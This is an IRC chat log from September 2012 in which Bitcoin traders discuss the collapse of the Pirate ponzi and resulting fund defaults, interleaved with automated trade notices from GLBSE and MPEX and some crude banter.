know? Sep 07 17:37:36 i think he has been making payments but not in fulll yet Sep 07 17:37:58 No, I mean, the experimental ponzi he started Sep 07 17:38:13 On the gamble section, when the "FUD" started Sep 07 17:39:09 Yeah, on the real thing, he has his insured on HK, so was waiting the maturity Sep 07 17:41:22 [MPEX] [F.GIGA.ETF] 7500 @ 0.00061619 = 4.6214 BTC [-] Sep 07 17:42:00 [10:02:16] THEN I annoucned a motion to move to obsi.hrpt as a new issue Sep 07 17:42:06 so how does that work? Sep 07 17:42:17 [GLBSE] [ARS] 75 @ 0.0153 = 1.1475 BTC [+] Sep 07 17:42:20 you just blindly passthrough? or does nefario manually swap the shares in the db? Sep 07 17:44:05 [MPEX] [S.MPOE] 19101 @ 0.00040512 = 7.7382 BTC [-] Sep 07 17:44:07 [MPEX] [S.MPOE] 14347 @ 0.00040496 = 5.81 BTC [-] Sep 07 17:44:16 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 07 17:45:08 usagi: why close CPA? Sep 07 17:45:41 hrm Sep 07 17:45:47 can CPA insure DM? Sep 07 17:45:51 er DMC Sep 07 17:46:17 you can insure gay 6990s?! Sep 07 17:47:31 usagi: so, can CPA insure DMC? Sep 07 17:47:59 is hashking in default? Sep 07 17:48:42 usagi: so can CPA insure DMC or not? Sep 07 17:49:08 heh. Sep 07 17:49:28 usagi: so whats next? Sep 07 17:49:34 is bmf and nyan folding too? Sep 07 17:49:45 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 07 17:50:01 okay, so Sep 07 17:50:06 why does bmf still exist? Sep 07 17:50:12 it should be under the nyan brand Sep 07 17:50:39 so? Sep 07 17:50:47 nyans hold mining dont they? Sep 07 17:51:35 How much are 5850s worth atm? Sep 07 17:51:48 DeaDTerra1: dunno, but if you're looking to buy one, Ill sell it to you Sep 07 17:52:30 Nah looking to sell them Sep 07 17:52:37 ahh Sep 07 17:54:31 coupla hundred i guess ? Sep 07 17:54:51 not even Sep 07 17:54:54 maybe $100. Sep 07 17:55:15 gabbynot not quite exactly. someone was trying to unload some exposure. Sep 07 17:55:31 lmao that little shit usagi defaulting now ? Sep 07 17:55:44 thx mircea Sep 07 17:55:47 jesus god, it took two days of ignore lalala. Sep 07 17:56:21 mircea_popescu: no, usagi is closing cpa Sep 07 17:56:27 [GLBSE] [TYGRR.BOND-PI] 1 @ 0.9999999 BTC [-] Sep 07 17:56:36 well... i see a bidwall at 1.0 on nyan.a atm Sep 07 17:56:39 mircea_popescu: the people he trusted with the money as a safe investment just stole it Sep 07 17:56:39 that's not quite moving Sep 07 17:56:41 so i guess... Sep 07 17:56:45 yaya. Sep 07 17:56:45 mircea_popescu: its not related to nyan or bmf Sep 07 17:56:58 !ticker nyan.a Sep 07 17:57:00 [GLBSE:NYAN.A] [Bid: 0.94] [Ask: 1] [Spread: 0.06] [Last: 1] [24hVol: 3] [7dAvg: 1.00238095] Sep 07 17:57:09 i see .94/1.0 on the supposed safest asset. Sep 07 17:57:17 which is paying like 1% in a coupla days, right ? Sep 07 17:57:38 Wow, everyone defaulting fml Sep 07 17:57:54 DeaDTerra1: yeah, because of fucking pirate Sep 07 17:57:54 DeaDTerra1 no, not everyone. you're lucky you got on mpex. Sep 07 17:57:58 everyone loaned the money to pirate Sep 07 17:58:02 where nobody's defaulting. Sep 07 17:58:05 because they're fucktards Sep 07 17:58:15 fine, you know what, Im getting in on this action Sep 07 17:58:20 dmc is now defaulting Sep 07 17:58:22 I dont know why Sep 07 17:58:23 lmao Sep 07 17:58:24 but we are Sep 07 17:58:28 Ill make up a reason later Sep 07 17:58:30 i thought it was already ? Sep 07 17:58:35 mircea_popescu: nope Sep 07 17:58:47 maybe i just called it early ? :D Sep 07 17:58:55 you cant default on a plan that will take years after 3 months Sep 07 17:59:36 [GLBSE] [GIGAMINING] 4 @ 0.76999 = 3.08 BTC [-] Sep 07 17:59:37 [GLBSE] [GIGAMINING] 1 @ 0.76999 BTC [-] Sep 07 18:00:02 GBF IS DEFAULTING,I AM TAKING ALL THE ASSETS AND RUNNING BECAUSE PIRATE! SORRY BUT PIRATE! Sep 07 18:00:07 [GLBSE] [NYAN.B] 10 @ 0.999 = 9.99 BTC [-] Sep 07 18:00:08 [GLBSE] [NYAN.B] 10 @ 0.99 = 9.9 BTC [-] Sep 07 18:00:12 that's what everyones doing right now blaming pirate for bullshit. Sep 07 18:00:12 DeaDTerra1: thats the spirit! Sep 07 18:00:30 [GLBSE] [BITBOND] 7 @ 0.4223 = 2.9561 BTC [+] Sep 07 18:00:52 [MPEX] [F.GIGA.ETF] 21040 @ 0.00061619 = 12.9646 BTC [-] Sep 07 18:00:52 DeaDTerra1 maybe so yea Sep 07 18:00:53 [MPEX] [F.GIGA.ETF] 24700 @ 0.00062546 = 15.4489 BTC [+] Sep 07 18:00:54 [MPEX] [F.GIGA.ETF] 15995 @ 0.00062704 = 10.0295 BTC [+] Sep 07 18:00:55 [MPEX] [F.GIGA.ETF] 15515 @ 0.00062944 = 9.7658 BTC [+] Sep 07 18:00:55 [MPEX] [F.GIGA.ETF] 1504 @ 0.00063065 = 0.9485 BTC [+] Sep 07 18:00:56 [MPEX] [F.GIGA.ETF] 3870 @ 0.00063116 = 2.4426 BTC [+] Sep 07 18:00:58 [MPEX] [F.GIGA.ETF] 24112 @ 0.0006383 = 15.3907 BTC [+] Sep 07 18:00:59 [MPEX] [F.GIGA.ETF] 13264 @ 0.00066445 = 8.8133 BTC [+] Sep 07 18:01:17 sigh.... Sep 07 18:02:27 im defaulting too Sep 07 18:02:29 all cause of pirte Sep 07 18:02:31 fuck you rg Sep 07 18:02:38 i'll come after you with a gun. Sep 07 18:02:39 maybe i didn't have money wit him Sep 07 18:02:43 but i could ae Sep 07 18:02:44 have Sep 07 18:02:58 MPEX defaults too Sep 07 18:03:20 its literally impossible for bitvps to default Sep 07 18:03:26 even if i lose that 200 BTC on the flash drive Sep 07 18:03:40 we are replenished every month Sep 07 18:04:56 we're getting a lot of sketchy orders lately tho Sep 07 18:05:03 i think i inadvertantly let some sketchy people on Sep 07 18:05:10 and now the word is out Sep 07 18:05:13 that its the place to be sketchy Sep 07 18:05:14 but Sep 07 18:05:15 its not! Sep 07 18:05:22 ha! Sep 07 18:07:55 people keep signing up for switlzerland Sep 07 18:08:00 im gonna need to get a few more boxes there Sep 07 18:08:10 https://bitcointalk.org/index.php?topic=106391.0 if anyone feels like a good read. Sep 07 18:08:35 [GLBSE] [GIGAMINING] 5 @ 0.77 = 3.85 BTC [+] Sep 07 18:09:04 [GLBSE] [TYGRR.BOND-P] 1 @ 0.091 BTC [+] Sep 07 18:12:08 ;;title Sep 07 18:12:09 (title ) -- Returns the HTML ... of a URL. Sep 07 18:12:15 ;;title https://bitcointalk.org/index.php?topic=106391.0 Sep 07 18:12:40 Personal responsiblity and the Ponzi scam. Sep 07 18:13:52 [GLBSE] [TYGRR.BOND-P] 10 @ 0.09 = 0.9 BTC [-] Sep 07 18:14:08 [GLBSE] [BIB.PIRATE] 11 @ 0.1 = 1.1 BTC [-] Sep 07 18:19:22 [GLBSE] [ASICMINER] 10 @ 0.1235 = 1.235 BTC [+] Sep 07 18:20:00 [GLBSE] [NASTY] 1 @ 0.63989 BTC [+] Sep 07 18:20:32 [GLBSE] [ASICMINER] 1 @ 0.1236 BTC [+] Sep 07 18:22:31 [GLBSE] [FPGA.CONTRACT] 31 @ 0.0719 = 2.2289 BTC [-] Sep 07 18:24:03 [GLBSE] [OBSI.HRPT] 43 @ 0.103989 = 4.4715 BTC [-] Sep 07 18:25:03 [GLBSE] [OBSI.HRPT] 5 @ 0.103989 = 0.5199 BTC [-] Sep 07 18:25:24 [GLBSE] [BTC-MINING] 3 @ 0.9979 = 2.9937 BTC [-] Sep 07 18:25:54 hello yes id like to take advantage of your baby prison Sep 07 18:25:59 we're calling it day care Sep 07 18:26:03 whatever Sep 07 18:26:04 runs Sep 07 18:27:04 I NEED TUNGSTEN TO LIVE Sep 07 18:27:07 TUNGGGGGGGGSTEEEEEEEEEN Sep 07 18:28:00 [GLBSE] [OBSI.HRPT] 100 @ 0.103989 = 10.3989 BTC [-] Sep 07 18:28:47 [GLBSE] [CPA] 9 @ 0.053 = 0.477 BTC [-] Sep 07 18:29:34 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 07 18:33:31 [GLBSE] [OBSI.HRPT] 1 @ 0.103989 BTC [-] Sep 07 18:34:07 [GLBSE] [PUREMINING] 9 @ 0.0931 = 0.8379 BTC [-] Sep 07 18:34:14 [MPEX] [S.MPOE] 34139 @ 0.00040496 = 13.8249 BTC [-] Sep 07 18:34:55 [GLBSE] [PUREMINING] 2 @ 0.0931 = 0.1862 BTC [-] Sep 07 18:38:32 [MPEX] [S.MPOE] 7600 @ 0.00040532 = 3.0804 BTC [+] Sep 07 18:38:33 [MPEX] [S.MPOE] 43500 @ 0.00040601 = 17.6614 BTC [+] Sep 07 18:42:33 [GLBSE] [BMF] 1 @ 0.59499 BTC [+] Sep 07 18:46:25 like what? Sep 07 18:47:53 why tungsten ? Sep 07 18:48:05 they found me in a meteor Sep 07 18:48:13 damn Sep 07 18:48:18 this opfab guy is pissed off at me Sep 07 18:48:24 and its all been a miscommunication Sep 07 18:48:45 so tell him Sep 07 18:49:16 usagi: dont have the btc. Sep 07 18:52:58 o hey, pirate paid out! Sep 07 18:53:31 What? A cofee? Sep 07 18:54:14 it's just my favourite joke for now. i think it may last me a decade. Sep 07 18:54:20 lol Sep 07 18:54:37 my last favourite joke was "Hey, Carter got reelected!" Sep 07 18:55:34 You can make something for this: https://bitcointalk.org/index.php?topic=103708.0 Sep 07 18:55:49 Or just look to take some lulz Sep 07 18:57:14 http://desmond.imageshack.us/Himg255/scaled.php?server=255&filename=sorrymario1.png&res=landing Sep 07 18:57:16 ahaah thats good Sep 07 18:59:37 [GLBSE] [HYDRO.BONDS] 1 @ 1.4499 BTC [-] Sep 07 19:00:26 I like this: http://24.media.tumblr.com/tumblr_m9z5een4es1qdkipyo1_r1_500.gif Sep 07 19:01:09 haha Sep 07 19:01:34 This one is good too: http://i.imgur.com/5UXtT.jpg Sep 07 19:01:44 i wish people would pay their bills Sep 07 19:01:49 i have 13 unpaid invoices right now Sep 07 19:01:57 and i know when i disable the vps Sep 07 19:01:59 im going to get rude emails Sep 07 19:02:20 on a lighter note Sep 07 19:02:29 one of our DC's assigned me an extra /26 Sep 07 19:02:31 for free Sep 07 19:02:32 woot Sep 07 19:02:59 nice Sep 07 19:03:17 nothin like a few more ip's to use Sep 07 19:03:30 [GLBSE] [MMM] 1 @ 0.9999 BTC [+] Sep 07 19:04:28 yep Sep 07 19:04:30 http://www.mememaker.net/static/images/memes/657000.jpg lol. teh truths. Sep 07 19:04:32 i was about to order more Sep 07 19:04:34 but before i did Sep 07 19:04:38 i asked which IPs were assigned to our VLAN Sep 07 19:04:43 and apparently there was an extra block in there Sep 07 19:04:46 :) Sep 07 19:05:38 man Sep 07 19:05:43 the btccharts.com vps sucks up tons of juice Sep 07 19:05:45 24/7 Sep 07 19:05:53 i wonder wtf is running server side there that takes so much juice Sep 07 19:06:27 bad code. Sep 07 19:09:26 woot Sep 07 19:09:31 new IP block activated Sep 07 19:10:20 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC Sep 07 19:19:07 [GLBSE] [FDBF] 15 @ 0.15 = 2.25 BTC [+] Sep 07 19:19:28 [GLBSE] [FDBF] 10 @ 0.15 = 1.5 BTC [+] Sep 07 19:22:49 [GLBSE] [GSDPT] 25 @ 0.0034 = 0.085 BTC [+] Sep 07 19:23:23 mircea can code Sep 07 19:23:30 mpex.php is more than a few lines Sep 07 19:23:31 [GLBSE] [OBSI.HRPT] 2 @ 0.10389 = 0.2078 BTC [-] Sep 07 19:23:32 [GLBSE] [OBSI.HRPT] 5 @ 0.10388 = 0.5194 BTC [-] Sep 07 19:23:34 [GLBSE] [OBSI.HRPT] 43 @ 0.10377 = 4.4621 BTC [-] Sep 07 19:24:16 [GLBSE] [JAH] 12 @ 0.149 = 1.788 BTC [-] Sep 07 19:24:59 [GLBSE] [TEEK.USD] 3 @ 0.0899 = 0.2697 BTC [-] Sep 07 19:25:44 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 07 19:26:37 [GLBSE] [BAKEWELL] 5 @ 0.15 = 0.75 BTC [+] Sep 07 19:27:45 is this theory that pirate just fronted for zeekrewards anything more than just forum nuttery ? Sep 07 19:28:13 http://www.forbes.com/sites/halahtouryalai/2012/08/22/zeekrewards-handed-over-to-receiver-whats-next-for-investors/ this thing Sep 07 19:29:23 [GLBSE] [FDBF] 15 @ 0.15 = 2.25 BTC [+] Sep 07 19:29:42 [GLBSE] [V.HRL] 3 @ 0.999999 = 3 BTC [-] Sep 07 19:30:25 [GLBSE] [UDN] 1 @ 0.088 BTC [+] Sep 07 19:30:54 [GLBSE] [FPGA.CONTRACT] 20 @ 0.0719 = 1.438 BTC [-] Sep 07 19:31:00 [MPEX] [S.MPOE] 7800 @ 0.00040496 = 3.1587 BTC [-] Sep 07 19:31:46 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0719 = 0.1438 BTC [-] Sep 07 19:35:23 [MPEX] [S.MPOE] 914 @ 0.00040496 = 0.3701 BTC [-] Sep 07 19:35:24 [MPEX] [S.MPOE] 30653 @ 0.00040376 = 12.3765 BTC [-] Sep 07 19:35:57 [GLBSE] [KRAKEN] 29 @ 0.00999999 = 0.29 BTC [+] Sep 07 19:36:42 [GLBSE] [OBSI.HRPT] 200 @ 0.103989 = 20.7978 BTC [+] Sep 07 19:37:20 Who thinks matt will pay out? ^^ Sep 07 19:37:28 the bet date is coming closer 2 days left Sep 07 19:38:39 i don't think you can find anyone who thinks so. Sep 07 19:40:10 [GLBSE] [BBBB] 21000 @ 0.00022 = 4.62 BTC [-] Sep 07 19:41:12 [GLBSE] [BIB.PIRATE] 20 @ 0.1 = 2 BTC [-] Sep 07 19:41:14 [GLBSE] [BBBB] 1 @ 0.00022 BTC [-] Sep 07 19:41:30 How were his odds? Wouldn't matt have been better off just buying bond-p or something? Sep 07 19:42:26 [GLBSE] [BBBB] 20999 @ 0.00022 = 4.6198 BTC [-] Sep 07 19:42:28 [GLBSE] [TYGRR.BOND-P] 24 @ 0.09 = 2.16 BTC [-] Sep 07 19:42:28 [GLBSE] [TYGRR.BOND-P] 9 @ 0.091 = 0.819 BTC [+] Sep 07 19:42:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09849703 BTC [+] Sep 07 19:42:31 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09931239 BTC [+] Sep 07 19:42:32 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09936904 BTC [+] Sep 07 19:42:34 [GLBSE] [TYGRR.BOND-P] 2 @ 0.09961509 = 0.1992 BTC [+] Sep 07 19:42:35 [GLBSE] [TYGRR.BOND-P] 3 @ 0.0996759 = 0.299 BTC [+] Sep 07 19:42:36 [GLBSE] [TYGRR.BOND-P] 30 @ 0.0999999 = 3 BTC [+] Sep 07 19:42:37 [GLBSE] [TYGRR.BOND-P] 6 @ 0.1 = 0.6 BTC [+] Sep 07 19:42:37 [GLBSE] [TYGRR.BOND-P] 3 @ 0.1 = 0.3 BTC [+] Sep 07 19:42:48 I guess he heard me Sep 07 19:43:06 If pirate lost that amount of money in other ponzi, he's even dumbest than I would have expected... Sep 07 19:43:26 [GLBSE] [NASTY] 2 @ 0.6199 = 1.2398 BTC [-] Sep 07 19:43:33 [GLBSE] [OBSI.HRPT] 19 @ 0.103989 = 1.9758 BTC [+] Sep 07 19:45:08 [GLBSE] [FPGA.CONTRACT] 5 @ 0.061 = 0.305 BTC [-] Sep 07 19:45:10 [GLBSE] [FPGA.CONTRACT] 20 @ 0.06 = 1.2 BTC [-] Sep 07 19:45:11 [GLBSE] [FPGA.CONTRACT] 91 @ 0.052 = 4.732 BTC [-] Sep 07 19:45:11 rdponticelli there seems to be some timing fit. Sep 07 19:45:12 [GLBSE] [FPGA.CONTRACT] 4 @ 0.0511 = 0.2044 BTC [-] Sep 07 19:45:18 ofcourse... may well be coincidence. Sep 07 19:45:30 Yeah, I read about it Sep 07 19:46:02 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0511 = 0.1022 BTC [-] Sep 07 19:46:03 anyway the people that keep going "he owed 500k so he ran off with 500k" really make me chuckle. Sep 07 19:46:03 [GLBSE] [FPGA.CONTRACT] 6 @ 0.051 = 0.306 BTC [-] Sep 07 19:46:04 [GLBSE] [FPGA.CONTRACT] 272 @ 0.04 = 10.88 BTC [-] Sep 07 19:46:05 [GLBSE] [TYGRR.BOND-P] 17 @ 0.1 = 1.7 BTC [+] Sep 07 19:46:15 [GLBSE] [BIB.PIRATE] 3 @ 0.1 = 0.3 BTC [-] Sep 07 19:46:28 ponzis collapse with something between 10 and .3%ish of what they owe left in cash Sep 07 19:46:34 he prolly had 10-20k tops. Sep 07 19:46:36 I dont know any of the behind the scenes stuff going on Sep 07 19:46:52 [GLBSE] [ARS] 4 @ 0.0148 = 0.0592 BTC [-] Sep 07 19:48:38 [MPEX] [F.GIGA.ETF] 19500 @ 0.00064782 = 12.6325 BTC [-] Sep 07 19:48:40 [MPEX] [F.GIGA.ETF] 22600 @ 0.00065662 = 14.8396 BTC [+] Sep 07 19:48:40 [MPEX] [F.GIGA.ETF] 17900 @ 0.0006571 = 11.7621 BTC [+] Sep 07 19:49:02 If he made a ponzi of himself and ran with 50kBTC, at least the guy is a con artist Sep 07 19:49:27 If he lost everything on other ponzi is just a fool Sep 07 19:50:55 inception ponzi Sep 07 19:52:17 [MPEX] [F.GIGA.ETF] 1177 @ 0.0006571 = 0.7734 BTC [+] Sep 07 19:52:17 [MPEX] [F.GIGA.ETF] 14883 @ 0.00065936 = 9.8133 BTC [+] Sep 07 19:52:19 [MPEX] [F.GIGA.ETF] 2050 @ 0.00066445 = 1.3621 BTC [+] Sep 07 19:52:20 [MPEX] [F.GIGA.ETF] 1890 @ 0.00069312 = 1.31 BTC [+] Sep 07 19:53:35 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 07 19:54:43 [GLBSE] [GSDPT] 170 @ 0.0034 = 0.578 BTC [+] Sep 07 19:58:06 [GLBSE] [CIUCIU.BOND] 10 @ 0.11 = 1.1 BTC [+] Sep 07 20:00:41 [GLBSE] [CPA] 10 @ 0.053 = 0.53 BTC [-] Sep 07 20:00:47 Hmm, hashking: https://bitcointalk.org/index.php?topic=66802.msg1167986#msg1167986 Sep 07 20:01:27 Hash, could you check this - Withdrawal 2012-09-03 08:41:40 1...... 20 btc Pending? Sep 07 20:01:31 this looks pretty damned bad. Sep 07 20:01:34 four days ? srsly ? Sep 07 20:04:19 I doubt Matt will pay ^^ anyone want to bet xD Sep 07 20:04:51 Bett on a bett on a pirate ponzi, the derivate of the derivative of a scam :P Sep 07 20:04:52 bet* Sep 07 20:05:44 That's how the financial nightmare has being built Sep 07 20:05:55 :D Sep 07 20:06:13 Let's not do it in bitcoinland too Sep 07 20:06:25 It has already been done xD Sep 07 20:06:40 Yeah... Sep 07 20:06:47 People placing deposits with pirate, or people that placed money with people that had money with pirate Sep 07 20:06:57 which is now causing the mass default we are seeing Sep 07 20:08:55 Let's hope everybody lean the lesson Sep 07 20:09:08 *learn Sep 07 20:11:23 [GLBSE] [OBSI.HRPT] 1 @ 0.1038 BTC [-] Sep 07 20:13:40 [GLBSE] [ASICMINER] 5 @ 0.12011 = 0.6006 BTC [+] Sep 07 20:13:42 [GLBSE] [ASICMINER] 24 @ 0.12 = 2.88 BTC [-] Sep 07 20:13:42 [GLBSE] [ASICMINER] 2 @ 0.12 = 0.24 BTC [-] Sep 07 20:14:53 [MPEX] [S.MPOE] 18347 @ 0.00040376 = 7.4078 BTC [-] Sep 07 20:14:54 [MPEX] [S.MPOE] 21343 @ 0.0004037 = 8.6162 BTC [-] Sep 07 20:20:01 [GLBSE] [ASICMINER] 6 @ 0.12358899 = 0.7415 BTC [+] Sep 07 20:20:05 [12:44:43] If I had 60,000 BTC... the last thing I would do is make this kind of bet Sep 07 20:20:06 [12:44:51] There's a lot of good he could have done with 60,000 btc Sep 07 20:20:09 if I had 60k btc Sep 07 20:20:13 [GLBSE] [GSDPT] 1780 @ 0.0034 = 6.052 BTC [+] Sep 07 20:20:15 well, I'd be rich Sep 07 20:21:59 [GLBSE] [ASICMINER] 2 @ 0.12 = 0.24 BTC [-] Sep 07 20:22:34 btw Sep 07 20:22:39 anyone see google's doodle today? Sep 07 20:22:40 it does shit Sep 07 20:23:03 Maybe he bet 100k somewhere else that pirate wouldn't pay xD Sep 07 20:25:54 [13:25] ;;rate Coolio- -10 " if someone loans you money, that's a gift" Sep 07 20:26:36 lol Sep 07 20:27:15 Coolio-'s joining Bulanula's club Sep 07 20:27:18 lol Sep 07 20:28:43 who wants to gift me some money Sep 07 20:28:50 erm, i mean, loan Sep 07 20:28:56 lol jcpham Sep 07 20:29:00 Ask Coolio- Sep 07 20:29:22 nah he's broke Sep 07 20:29:37 he was pulling some B&E action to repay lender A Sep 07 20:29:43 then he got burglared himself Sep 07 20:29:59 now we has no gold chains to pawn for bitcoins Sep 07 20:30:07 Well, maybe the lendee would be reeses in the end Sep 07 20:30:08 [GLBSE] [NYAN.C] 1 @ 0.695 BTC [-] Sep 07 20:30:15 XD Sep 07 20:31:32 [GLBSE] [FPGA.CONTRACT] 1 @ 0.07189 BTC [+] Sep 07 20:31:53 [GLBSE] [YABMC] 7 @ 0.1159 = 0.8113 BTC [-] Sep 07 20:32:05 [GLBSE] [FDBF] 10 @ 0.15 = 1.5 BTC [+] Sep 07 20:32:26 [GLBSE] [OBSI.HRPT] 2 @ 0.103989 = 0.208 BTC [+] Sep 07 20:35:22 [GLBSE] [MU] 3 @ 0.3492 = 1.0476 BTC [-] Sep 07 20:37:04 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 07 20:39:10 [GLBSE] [FDBF] 30 @ 0.15 = 4.5 BTC [+] Sep 07 20:39:45 [GLBSE] [YARR] 1 @ 1.25 BTC [-] Sep 07 20:39:47 [GLBSE] [YARR] 9 @ 1.27999999 = 11.52 BTC [+] Sep 07 20:39:48 [GLBSE] [YARR] 16 @ 1.28 = 20.48 BTC [+] Sep 07 20:39:48 [GLBSE] [YARR] 20 @ 1.28999998 = 25.8 BTC [+] Sep 07 20:39:50 [GLBSE] [YARR] 20 @ 1.29 = 25.8 BTC [+] Sep 07 20:39:51 [GLBSE] [YARR] 4 @ 1.3 = 5.2 BTC [+] Sep 07 20:45:37 [GLBSE] [GIGAMINING] 2 @ 0.77 = 1.54 BTC [+] Sep 07 20:50:48 ARRRRR Sep 07 20:50:53 I AM THE ASSPIRATE Sep 07 20:51:01 AND I AM HERE TO PLUNDER YOUR BOOTY Sep 07 20:52:24 copumpkin http://polimedia.us/dtng/c/src/134055426552.jpg Sep 07 20:52:27 be sociable dood. Sep 07 20:52:54 mircea_popescu: yessiree! Sep 07 20:58:13 [MPEX] [S.MPOE] 1500 @ 0.00040601 = 0.609 BTC [+] Sep 07 20:58:15 [MPEX] [S.MPOE] 12826 @ 0.00040629 = 5.2111 BTC [+] Sep 07 21:01:41 [GLBSE] [FPGAMINING] 2 @ 0.7666 = 1.5332 BTC [-] Sep 07 21:01:42 [GLBSE] [FPGAMINING] 5 @ 0.7661 = 3.8305 BTC [-] Sep 07 21:01:43 [GLBSE] [FPGAMINING] 3 @ 0.766 = 2.298 BTC [-] Sep 07 21:01:44 [GLBSE] [FPGAMINING] 2 @ 0.761 = 1.522 BTC [-] Sep 07 21:01:46 [GLBSE] [FPGAMINING] 1 @ 0.76 BTC [-] Sep 07 21:01:47 [GLBSE] [FPGAMINING] 3 @ 0.75 = 2.25 BTC [-] Sep 07 21:01:48 [GLBSE] [FPGAMINING] 5 @ 0.74035001 = 3.7018 BTC [-] Sep 07 21:01:49 [GLBSE] [FPGAMINING] 9 @ 0.74035 = 6.6632 BTC [-] Sep 07 21:11:19 [GLBSE] [GMVT-BOT] 1 @ 0.1689 BTC [+] Sep 07 21:11:55 [GLBSE] [FPGA.CONTRACT] 1 @ 0.07189 BTC [+] Sep 07 21:12:21 [GLBSE] [DI.BFLSC.FAIL] 12 @ 0.001 = 0.012 BTC [+] Sep 07 21:16:25 "I’m going back to the frozen north, where the pricks are hard and strong: Sep 07 21:16:25 back to the land of the all-night stand-where the nights are six months long. Sep 07 21:16:25 Where you get it in bits as hard as tin in the land where spunk is spunk- Sep 07 21:16:25 not a trickling stream of lukewarm cream, but a solid frozen chunk." Sep 07 21:19:01 heya Sep 07 21:19:36 aloha Sep 07 21:20:15 [GLBSE] [FDBF] 100 @ 0.15 = 15 BTC [+] Sep 07 21:21:13 [GLBSE] [GSDPT] 250 @ 0.0034 = 0.85 BTC [+] Sep 07 21:22:05 hows it going Sep 07 21:23:56 [MPEX] [S.MPOE] 8100 @ 0.00040395 = 3.272 BTC [-] Sep 07 21:23:57 [MPEX] [S.MPOE] 25524 @ 0.0004037 = 10.304 BTC [-] Sep 07 21:23:59 [MPEX] [S.MPOE] 15376 @ 0.00040349 = 6.2041 BTC [-] Sep 07 21:24:59 !ticker FDBF Sep 07 21:25:03 [GLBSE:FDBF] [Bid: 0.145] [Ask: 0.15] [Spread: 0.005] [Last: 0.15] [24hVol: 34.05] [7dAvg: 0.14925664] Sep 07 21:27:18 not so bad. Sep 07 21:28:57 also if anyone is interested, we will begin opening bitcoin accounts for metatrader4 on monday or tuesday Sep 07 21:29:34 kakobrekla: oh? where? Sep 07 21:29:55 on the internets? :) Sep 07 21:30:03 lol Sep 07 21:30:13 who is the 'we'? Sep 07 21:30:30 me and a forex company Sep 07 21:32:22 [MPEX] [F.GIGA.ETF] 14999 @ 0.00064606 = 9.6903 BTC [-] Sep 07 21:36:52 [GLBSE] [ASICMINER] 16 @ 0.12 = 1.92 BTC [-] Sep 07 21:38:05 [GLBSE] [OBSI.HRPT] 15 @ 0.103989 = 1.5598 BTC [+] Sep 07 21:38:54 no Sep 07 21:39:01 but you will be able to trade any pair with btc Sep 07 21:39:03 and make btc Sep 07 21:39:45 with 100btc you can trade up to 0.1 lot, 1:1 - 1:1000 Sep 07 21:40:04 dedicated page is comming, if you want some some more details now pm me Sep 07 21:49:33 [GLBSE] [TYGRR.BOND-P] 6 @ 0.1 = 0.6 BTC [+] Sep 07 21:53:07 [GLBSE] [TYGRR.BOND-P] 1 @ 0.10022871 BTC [+] Sep 07 21:53:59 [GLBSE] [TYGRR.BOND-P] 1 @ 0.10062089 BTC [+] Sep 07 21:54:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.12 BTC [+] Sep 07 21:54:52 [GLBSE] [TYGRR.BOND-P] 1 @ 0.12345678 BTC [+] Sep 07 21:55:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.13 BTC [+] Sep 07 21:58:35 [MPEX] [B.MPCD.A] 49692 @ 0.00100618 = 49.9991 BTC [+] Sep 07 22:01:11 [MPEX] [S.MPOE] 12824 @ 0.00040349 = 5.1744 BTC [-] Sep 07 22:03:07 [GLBSE] [BIB.PIRATE] 1 @ 0.0915 BTC [-] Sep 07 22:25:38 [GLBSE] [CPA] 4 @ 0.04 = 0.16 BTC [-] Sep 07 22:29:14 [MPEX] [F.GIGA.ETF] 8400 @ 0.00069108 = 5.8051 BTC [+] Sep 07 22:30:58 [GLBSE] [GIGAMINING] 3 @ 0.76 = 2.28 BTC [-] Sep 07 22:35:55 [MPEX] [S.MPOE] 33500 @ 0.00040196 = 13.4657 BTC [-] Sep 07 22:45:40 [GLBSE] [BDK.BND] 15 @ 0.096 = 1.44 BTC [-] Sep 07 22:45:41 [GLBSE] [BDK.BND] 20 @ 0.095 = 1.9 BTC [-] Sep 07 22:47:24 [GLBSE] [GIGAMINING] 4 @ 0.76 = 3.04 BTC [-] Sep 07 22:49:34 [GLBSE] [GIGAMINING] 5 @ 0.76 = 3.8 BTC [-] Sep 07 22:49:57 [GLBSE] [YABIF] 2 @ 0.999 = 1.998 BTC [-] Sep 07 22:50:30 [GLBSE] [KRAKEN] 20 @ 0.00999999 = 0.2 BTC [+] Sep 07 22:50:45 [GLBSE] [YABIF] 1 @ 0.999 BTC [-] Sep 07 22:51:53 [MPEX] [F.GIGA.ETF] 3310 @ 0.00069312 = 2.2942 BTC [+] Sep 07 22:52:32 [GLBSE] [FUTUREFUND] 8 @ 0.00012433 = 0.001 BTC [+] Sep 07 22:53:21 [GLBSE] [FUTUREFUND] 5 @ 0.00012433 = 0.0006 BTC [+] Sep 07 22:57:52 [GLBSE] [FUTUREFUND] 1 @ 0.00012433 BTC [+] Sep 07 22:57:54 sooo... if i ran a service that took euro via pp/etc and then i started accepting bitcoins and now i actually am dumping pp and only accepting bitcoins Sep 07 22:57:59 am i the first business in the world to have done this ? Sep 07 22:59:08 You would be one of the pioneers, maybe... Sep 07 22:59:19 ;) Sep 07 22:59:35 but has anyone else done this before ? is what i'm curious. Sep 07 23:00:02 I don't know Sep 07 23:00:07 cause if not, remember, remember the 7th of september. Sep 07 23:01:08 Links? Sep 07 23:02:35 http://trilema.com/2012/adio-paypal-trecem-pe-bitcoini/ that;d be the announcement Sep 07 23:02:38 obviously, in romanian. Sep 07 23:05:34 lol Sep 07 23:05:52 I'm talking with myself from your pow? Sep 07 23:06:28 rdponticelli hm ? Sep 07 23:07:07 Ok, people I can't intermediate all of you that have each other on ignore.... Sep 07 23:07:17 xD Sep 07 23:07:51 I put have the ignore chip in my head Sep 07 23:08:17 lmao Sep 07 23:08:23 why don't you quit with all the romanistan words Sep 07 23:08:26 and use grish Sep 07 23:08:31 what's grish ? Sep 07 23:08:32 *engrish Sep 07 23:08:45 you're not talking to me, are 